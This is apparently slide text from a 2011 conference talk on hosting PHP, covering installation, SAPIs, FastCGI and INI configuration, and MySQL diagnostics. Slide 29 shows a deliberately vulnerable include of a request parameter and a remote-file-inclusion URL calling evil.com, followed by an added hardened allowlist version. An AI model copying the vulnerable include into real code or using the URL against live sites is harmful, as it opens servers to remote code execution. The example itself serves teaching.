The document discusses PHP from the perspective of a web hosting provider. It covers topics like installing PHP from source or using package managers, different PHP APIs like FastCGI and CLI, PHP configuration options and their security implications, PHP versions and features like PEAR and PECL, why PHP attracts many developers both skilled and unskilled, common security issues and their true causes, and scaling PHP applications by scaling up or out.
Php through the eyes of a hoster phpbnl11
1. PHP through the eyes of a hoster
Thijs Feryn, Evangelist
+32 (0)9 218 79 06
thijs@combellgroup.com
PHPBenelux Conference, Saturday January 29th 2011, Antwerpen, Belgium
7. I live in the wonderful city of Bruges
MPBecker - Bruges by Night
http://www.flickr.com/photos/galverson2/3715965933
8. Follow me on Twitter: @ThijsFeryn
Read my blog: http://blog.feryn.eu
Give me feedback: http://joind.in/2490
11. Chapter I: The hoster, a genuine stakeholder in the PHP universe
12. Stakeholders
[Diagram labels: Customer; Development company; Endusers; MGMT; Devs; Design; PM; Internal IT; Sales; QA; Internal Systeam; Consultant; Hoster; PHP community]
13. Stakeholders
Somewhere along the road ... Your app needs to be hosted
14. Goals & motives
Our goals & motives are the same as yours:
• It has to work
• It has to perform
• It has to scale
• It has to be secure
• It has to be available
20. Installing using a package manager (APT/Aptitude)
Install PHP:
    server$ apt-get install php5
Install MySQL library for PHP:
    server$ apt-get install php5-mysql
21. SAPI ... schmapi
              | Mod_php           | FastCGI                   | CLI
Web           | Apache module     | gateway                   | -
Process       | Apache process    | php-cgi                   | php
Configuration | Apache conf files | wrapper                   | on the fly
User          | Apache user       | shell user or suexec user | shell user
22. FastCGI
Example config:
• Apache handler
    <IfModule mod_fcgid.c>
        SuexecUserGroup dev dev
        PHP_Fix_Pathinfo_Enable 1
        <Directory /var/www/dev/www/>
            Options +ExecCGI
            AllowOverride All
            AddHandler fcgid-script .php
            FCGIWrapper /var/www/dev/etc/fcgi.wrapper .php
            Order allow,deny
            Allow from all
        </Directory>
    </IfModule>
25. INI settings: tales of good & evil
Defining INI settings:
• php.ini
• ini_set()
• "-d"
• php_value
• php_flag
• php_admin_value
• php_admin_flag
26. INI settings: tales of good & evil
memory_limit:
    Fatal error: Allowed memory size of 16777216 bytes exhausted (tried to allocate 35 bytes)
28. INI settings: tales of good & evil
safe_mode & open_basedir:
    <IfModule mod_php5.c>
        php_admin_flag engine on
        php_admin_flag safe_mode off
        php_admin_value open_basedir "/var/www/vhosts/website.com/httpdocs:/tmp"
    </IfModule>
29. INI settings: tales of good & evil
allow_url_fopen:
    <?php
    $lang = $_GET['lang'];
    require("$lang.php");

    http://domain.ext/index.php?lang=http://evil.com/hack.txt?
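A hardened form of the include on slide 29, as an added example that is not from the original slides: the request value is only used as a key into a fixed allowlist, and the resolved path must stay inside the language directory. The temporary `lang_demo_*` directory, the language codes and the function name `resolveLanguageFile()` are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Added example, not from the original slides. The directory layout, language
// codes and function name are assumptions.

// Map a user-supplied language code to a local file, or return null.
// The request value is never concatenated into a path.
function resolveLanguageFile(string $lang, string $baseDir, array $allowed): ?string
{
    // 1. Strict allowlist lookup: URLs, "../" sequences and anything else
    //    that is not a listed code fail here.
    if (!isset($allowed[$lang])) {
        return null;
    }

    // 2. Defence in depth: the resolved file must exist and stay inside
    //    $baseDir (catches symlinks or a bad allowlist entry).
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $allowed[$lang]);
    if ($base === false || $path === false) {
        return null;
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Constructed sample data: a temporary language directory with two files.
$baseDir = sys_get_temp_dir() . '/lang_demo_' . getmypid();
@mkdir($baseDir);
file_put_contents("$baseDir/en.php", "<?php return ['hello' => 'Hello'];");
file_put_contents("$baseDir/nl.php", "<?php return ['hello' => 'Hallo'];");
$allowed = ['en' => 'en.php', 'nl' => 'nl.php'];

// Constructed inputs, including the remote URL shown on the slide.
$inputs = ['nl', 'http://evil.com/hack.txt?', '../../etc/passwd', ''];
foreach ($inputs as $input) {
    $file = resolveLanguageFile($input, $baseDir, $allowed) ?? "$baseDir/en.php";
    $strings = require $file;
    printf("%-28s -> %s (%s)\n", var_export($input, true), basename($file), $strings['hello']);
}
```

Since PHP 5.2, remote includes additionally require `allow_url_include`, which is off by default. The allowlist also rejects local path traversal, which neither INI switch covers.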
32. PHP 4: End of life, but far from dead
    Parse error: syntax error, unexpected T_STRING, expecting T_OLD_FUNCTION or T_FUNCTION or T_VAR or '}' in test.php on line 4
65.
    mysql> explain SELECT field1, (SELECT COUNT(*) FROM table2 WHERE field3 = table1.id) FROM table1 WHERE field2 = 1 ORDER BY field4 DESC limit 12,12;
    *************************** 1. row ***************************
               id: 1
      select_type: PRIMARY
            table: table1
             type: ALL
    possible_keys: approved
              key: approved
          key_len: NULL
              ref: NULL
             rows: 3143
            Extra: Using where; Using filesort
    *************************** 2. row ***************************
               id: 2
      select_type: DEPENDENT SUBQUERY
            table: table2
             type: ALL
    possible_keys: NULL
              key: NULL
          key_len: NULL
              ref: NULL
             rows: 1005
            Extra: Using where
66.
    mysql> show processlist;
    +-------+------+-----------+----+---------+------+----------------------+-------------------------------------------------+
    | Id    | User | Host      | db | Command | Time | State                | Info                                            |
    +-------+------+-----------+----+---------+------+----------------------+-------------------------------------------------+
    | 63515 | root | localhost | db | Query   | 0    | NULL                 | show processlist                                |
    | 81763 | root | localhost | db | Sleep   | 105  |                      | NULL                                            |
    | 85187 | root | localhost | db | Query   | 0    | Sending data         | SELECT data from someTable where field = 'val'  |
    | 82701 | root | localhost | db | Query   | 0    | Copying to tmp table | SELECT data from someTable where field='val2'   |
    | 82709 | root | localhost | db | Query   | 0    | Sorting result       | SELECT data from someTable where order by field |
    | 82716 | root | localhost | db | Query   | 0    | Opening tables       | SELECT data from someOtherTable                 |
    +-------+------+-----------+----+---------+------+----------------------+-------------------------------------------------+
74. Summary
1. Hosters are a genuine stakeholder in the PHP universe
2. PHP is highly flexible & configurable. Hosters have to ensure a decent setup
3. PHP has a lot to offer feature-wise
4. PHP attracts a crowd and brings a lot of people together from different industries (e.g. hosters)
5. Lots of abuse cases are PHP related, but that’s not the fault of PHP itself
6. PHP itself doesn’t scale *that* well, but is flexible enough to ensure scalability via extra tools